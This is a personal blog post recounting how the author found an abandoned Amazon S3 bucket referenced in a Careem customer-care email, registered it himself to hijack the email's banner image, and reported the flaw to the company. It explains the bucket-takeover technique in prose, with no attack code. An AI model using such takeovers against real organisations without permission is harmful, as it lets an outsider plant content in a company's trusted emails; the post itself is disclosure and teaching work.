This story happened last year and I thought it is a good case study of taking advantage of broken links. additionally, it contains a funny story that shows I am getting security wherever I go :D
Last year, I traveled to Dubai to explore the place and to meet some of the Good friends: Yasser, Ahmed, and Ayoub.
I am a loyal user of Careem I use it most of the time wherever I travel and also I use it while I am in Iraq when my time to travel back home had come I ordered a taxi via Careem application. I waited and the driver was out somewhere nearby my hotel. I took my bag out and waited for him on the sidewalk in the hope that he sees me since it was in the morning while nobody was out there. He saw me but never moved and I was waving at him he when left me and canceled the ride and wrote that I didn’t show up.
I was frustrated and ordered a new one since I have to go to the airport as soon as possible, the driver was nearby so it didn’t take much time. However, I found that the Careem app already charged a fee for the last ride that I didn’t take!
When I went home, I wrote a complaint about the trip, and they called me, I explained what happened to them and they said they were sorry and return the ride fee, Heeey.
After a while, I received from their Customer Care asking if I am satisfied about my last interaction with their team. There was a broken link in the email I was perplexed why they didn’t notice that.
I used the inspect element tool in the browser just to take a look at the broken link, the link was:
<img alt="Careem" title="Careem" src="https://ci5.googleusercontent.com/proxy/VFkr93bHbGyGsKAShSjEy1Wa5c2_E1roaPHqkXAgvfFVAe-4cPZ59CKXCpY-vig5E96sY7ojsvKFiy8uAkfA564sndlRHO01J_LqgsbCJyyzudeSS78=s0-d-e1-ft#https://s3.amazonaws.com/careemcrm/promotional/careem_logo_Care.png" class="CToWUd">
Since I was using Gmail, there is a feature that prevents photos from being viewed directly, so the real link of the image is the link after the location hash which is:
So, it is an S3 bucket I thought that the
careem_logo_Care.png is deleted, and caused this error but I went to see the bucket link, and it showed the following response:
As you can see, the response says
<Code>NoSuchBucket</Code>, in the security world, means that we can take over this bucket and that what happened I used the AWS CLI with my AWS account to register the bucket. Then, I copied a file from my PC to the S3 bucket.
And here is our PoC:
I tried to find where I can report this issue but to no avail, Careem has no bug bounty, so I was a little bit disappointed that such a reputable company has no BBP.
I contacted one of my friends that works in the Iraq office of Careem, and he forwarded me to the security team, and they fixed the issue. I told them I would remove the S3 bucket from my account so they could take it again, but they said they don’t want it anymore.
They emailed to inform that they fixed the issue and the root cause was:
Based on your initial description and proof-of-concept, this was appear to be abundant S3 bucket which may belong to someone used to work with the company, and as a direct result of this no one handed over all info
In summary, I was able to hijack the Customer Care email banner with any image I want to view. Furthermore, I was not sure about what other links pointing to this bucket, so maybe other interesting places use this bucket.
For Bug Bounty Hunters & Security Engineers
Importantly, make sure to keep an eye on the broken links and links that are in emails/pdf/or for an old event.
URL Tracker Project!
I created a side project that may help to keep tracking of all cloud services and links that may open the door for taking over issues. The project still in progress you can follow it here.
If you think your site/app/network are secure and want to make sure about that then